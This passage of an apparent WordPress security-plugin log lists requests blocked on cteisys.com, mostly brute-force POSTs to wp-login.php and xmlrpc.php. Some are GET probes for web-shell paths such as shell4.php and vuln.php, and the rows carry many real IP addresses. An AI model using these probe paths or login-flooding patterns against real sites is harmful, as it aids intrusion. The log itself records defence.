Safari\\/537.36\"}','Cc0EmW5yeUpF1XRa9TViYzuK',0,1664003890.2177,1330,'','POST',403,0,600,0,1,'',0),('5.175.45.32',95366432,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','AFqEMViKUyhX1BOSgjYPI2GQ',0,1664004913.4778,499,'','POST',403,0,600,0,1,'',0),('5.175.45.32',95366432,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','ArifogwMK37ys8aPe1V04THq',0,1664004914.9632,565,'','POST',403,0,600,0,1,'',0),('162.144.87.29',2727368477,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','3oqQxzZjCectbdOL8fFrWBuP',0,1664004926.3960,561,'','POST',403,0,600,0,1,'',0),('45.162.229.147',765650323,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','R1LEpkUJ7hOl5dc2oWI8nfjV',0,1664005013.3565,1511,'','POST',403,0,515,0,1,'',0),('104.196.239.166',1757736870,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','YBL485Pvtr2TzCcKObAZHfXi',0,1664005770.0627,1487,'','POST',403,0,515,0,1,'',0),('104.196.239.166',1757736870,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','v42hblWqLe6NuKMxQAP95zdH',0,1664005771.9222,477,'','POST',403,0,515,0,1,'',0),('104.196.239.166',1757736870,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','tWaswSgXpZxqbjfcHRudnrOM',0,1664005772.7806,466,'','POST',403,0,515,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','YwpavrzfFl9DC2ZLmQ4RTOVS',0,1664005965.2581,1222,'','POST',403,0,600,0,1,'',0),('213.152.161.170',3583549866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Eon584tbJRcjykYDXPqBaMKi',0,1664006660.0678,13276,'','POST',403,0,515,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','Pu4rW50pB6HYiRocJZlkAa98',0,1664007012.8377,1688,'','POST',403,0,600,0,1,'',0),('68.183.75.82',1152863058,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','ctjYeB9WUfbzFaC6yIhQuJTr',0,1664008066.8473,17463,'','POST',403,0,600,0,1,'',0),('68.183.86.247',1152866039,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','AxnkuJr0lqcWiym5SCRdUGwQ',0,1664009119.3098,5291,'','POST',403,0,600,0,1,'',0),('89.249.74.213',1509509845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PnTF5EoZKvMWyBhYb3JpNSjL',0,1664009152.3844,2310,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fUd1eYnJZV4oXzmvFaR5ixD2',0,1664009739.9393,18204,'','POST',403,0,515,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Cvz9Bwkqj6ndZcMDS4XgIGKy',0,1664009973.5608,1825,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','tyh1aC5QEXRFrviTHxBKSUeV',0,1664010288.6337,1671,'','POST',403,0,600,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WPjICgVyE7xkZ342hQwGeUNd',0,1664010320.6124,875,'','POST',403,0,515,0,1,'',0),('185.156.175.35',3114053411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lGcRIfTK6aCLb7jzm8q50wvW',0,1664010906.5132,1562,'','POST',403,0,515,0,1,'',0),('103.152.164.156',1738056860,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OPTFKGDy0IoghNsUrj49ntic',0,1664011138.6566,1330,'','POST',403,0,515,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','wF4Wd3luREtPDbYegicMNHxp',0,1664011332.4122,1408,'','POST',403,0,600,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MsgvXOGm1VSYALjeC89rkWcB',0,1664011624.8198,6641,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TNDUEBlq7mM0AZ1O4FQtGeRd',0,1664011961.9887,1426,'','POST',403,0,515,0,1,'',0),('64.227.161.192',1088659904,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','VnNxRs7CfjkMJqQBOTt3oy6d',0,1664012043.4199,469,'','POST',403,0,600,0,1,'',0),('64.227.161.192',1088659904,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','KHmYe9gPIR0ENjlZd7b31U26',0,1664012045.5177,480,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','daU4mfnoeFCMqPH09srEv7zp',0,1664012386.4490,1228,'','POST',403,0,600,0,1,'',0),('95.81.81.219',1599164891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZanObmkfj1B0dELwloDhiNxy',0,1664012498.6076,2094,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n73XMBKv6uYHz2dA0SscCiTr',0,1664013324.1094,2520,'','POST',403,0,515,0,1,'',0),('77.65.213.168',1296160168,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Wkd3ELBt9OFrsPV1myoU80DA',0,1664013442.4517,1415,'','POST',403,0,600,0,1,'',0),('88.198.218.4',1489426948,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','SI5Cx3ykluYLBwUMR6DQqtNX',0,1664013888.4211,3445,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','AicIQn7qZChXTjYkWFaH6mSf',0,1664013895.4424,292,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QYnUwRkbvBiuy87EImN6xaAe',0,1664013898.8563,317,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FQC6uThfmIaV4wdj1iJLNGrY',0,1664013903.3831,484,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','http://cteisys.com/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','udnV5O3Z0HayWSAfxEkhJmiF',0,1664013906.9578,426,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','https://cteisys.com/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','YWFcdC7shbA0LDIVfkH35XZ6',0,1664013911.4658,316,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','http://cteisys.com/shell4.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zGa52vKhFnQCdUoSJsDO9tPi',0,1664013914.4404,280,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','https://cteisys.com/shell4.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','tcATBbVkYj2RySHQfM1DCPEN',0,1664013917.7287,312,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','http://cteisys.com/ru.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lmyKpSJAUaTqHPZIeQFsdc73',0,1664013921.8968,313,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','https://cteisys.com/ru.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uCrwq1tsUbDO7aIzXQkWljGF',0,1664013925.6656,316,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','http://cteisys.com/saudi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','d02B59uFqnj1YJyrRKOG7XIM',0,1664013929.7372,318,'','GET',403,0,700,0,1,'',0),('88.198.218.4',1489426948,'','https://cteisys.com/saudi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nL7c3djzhfmGCVgXx4ObIJwe',0,1664013933.7804,303,'','GET',403,0,700,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OEa8orhjVRSs0lvLGzCXQ9u2',0,1664014173.3243,2726,'','POST',403,0,515,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gcLmonvVXAjOe9kqJuwpGYEF',0,1664014536.5924,18359,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','iqH0nN1TlskYup3Lhw4Kd58R',0,1664015176.0101,1230,'','POST',403,0,600,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wrTz2eBF6icASjso0lQtqmHp',0,1664015403.6957,7157,'','POST',403,0,515,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','0IgG7VLqvzkjxHBiEZlYtXS9',0,1664015554.9413,1177,'','POST',403,0,600,0,1,'',0),('62.102.148.162',1046910114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','exbI9madfZTBnQjq6WSEDriz',0,1664015852.7255,1329,'','POST',403,0,515,0,1,'',0),('101.37.28.132',1696930948,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OAf8Pho7mMXDI0xidUws2ygR',0,1664015917.8338,1254,'','POST',403,0,515,0,1,'',0),('185.156.175.51',3114053427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OP8cqniQ274MpIrlwYzm51HN',0,1664016161.0607,1394,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','FRtj1VQvIwyxqAHdCsh7kJmG',0,1664016607.6773,18175,'','POST',403,0,600,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eSh7cZJRTkI9MY0oBdF3laHA',0,1664016822.1476,2403,'','POST',403,0,515,0,1,'',0),('190.169.30.54',3198754358,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5ovJaQB2C0hkeiAEgPdKnlzZ',0,1664017177.3016,1426,'','POST',403,0,515,0,1,'',0),('103.130.218.150',1736628886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','wGSXzshPQC3fo7rLc42UxZvE',0,1664017263.2799,498,'','POST',403,0,600,0,1,'',0),('103.130.218.150',1736628886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','5Y6NVFMJHQGqIil19PapuhKE',0,1664017265.0769,456,'','POST',403,0,600,0,1,'',0),('134.209.184.76',2261891148,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','SvyCxu4hHYzdrFU2w76TjMDn',0,1664017668.6468,9053,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','vzA6nH3wdCNPh1DeFaGQUKME',0,1664017926.1378,1573,'','POST',403,0,600,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dZinajlE9XNCkGb3crsxO4FL',0,1664018069.0905,924,'','POST',403,0,515,0,1,'',0),('35.230.56.59',602290235,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','GMVteCNBk9XlDU471Z5hInbd',0,1664018491.5024,610,'','POST',403,0,515,0,1,'',0),('35.230.56.59',602290235,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','v8VUS2CfY64xlL7pnHJKIkQO',0,1664018492.5710,655,'','POST',403,0,515,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','72fp5mWIb3eF0r4Ql1LdaJXD',0,1664018710.2933,516,'','POST',403,0,600,0,1,'',0),('124.217.226.56',2094654008,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','thg7vP0uICVkeGM64TYORFzc',0,1664018932.4672,1263,'','POST',403,0,515,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','x6U3vhlq5misZeQwAbJXDfjt',0,1664019080.8384,1887,'','POST',403,0,600,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-content/vuln.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0jAabrg7PSLh2Ifnc9vZlGKo',0,1664019114.2255,339,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-content/vuln.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fpQVwcPGrksaXZeB2ulWHAm4',0,1664019120.0220,310,'','GET',403,0,700,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p2EybSZJGzCQFT31c4AsMuBd',0,1664019459.5117,1420,'','POST',403,0,515,0,1,'',0),('51.178.76.51',867322931,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','ruMIQARpa7wh84o6Lyb1ZUmj',0,1664019757.5479,1222,'','POST',403,0,600,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BDqQSfMCbHOI5oNJK6rPX90a',0,1664019836.9468,1242,'','POST',403,0,515,0,1,'',0),('66.29.131.126',1109230462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fYmU4drbC3wVupvkDqcoTQZW',0,1664020354.9826,19057,'','POST',403,0,515,0,1,'',0),('185.69.154.241',3108346609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','UxEGpQsBHwcYDidylnh9eZ85',0,1664020408.2768,502,'','POST',403,0,600,0,1,'',0),('185.69.154.241',3108346609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','tP5R8F4QA2hmyVHv1BnOc0XJ',0,1664020409.7494,486,'','POST',403,0,600,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pA8tRXmJgCyzNKjkQ9x5oulP',0,1664020743.8078,1267,'','POST',403,0,515,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ixSrcVBALOHv6p05mb2P1oTZ',0,1664020808.5575,1953,'','POST',403,0,600,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oaVPIZqLyunCGJOXr3EH0i9S',0,1664021676.6609,17773,'','POST',403,0,515,0,1,'',0),('20.101.71.221',342181853,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','K5FVk48e3fCcHW0o92DxtaN7',0,1664021859.7606,1821,'','POST',403,0,600,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mUeFRjLxQAsWarI93M5TGvEB',0,1664022199.6463,18545,'','POST',403,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vFphy2VW3HOPUlIg0rTEJxuc',0,1664022593.1303,1535,'','POST',403,0,515,0,1,'',0),('47.90.138.35',794462755,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','iEy8BIsSrzCHhKeuRaQkUtPj',0,1664022720.0130,688,'','POST',403,0,600,0,1,'',0),('103.166.183.192',1738979264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','GvHS6r2mWg9ARj7plk0BCcqe',0,1664022885.4587,1264,'','POST',403,0,600,0,1,'',0),('120.76.135.15',2018281231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7pz9wP4VBrGoSaM5x0e8QTfO',0,1664023478.5392,19242,'','POST',403,0,515,0,1,'',0),('164.46.122.50',2754509362,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 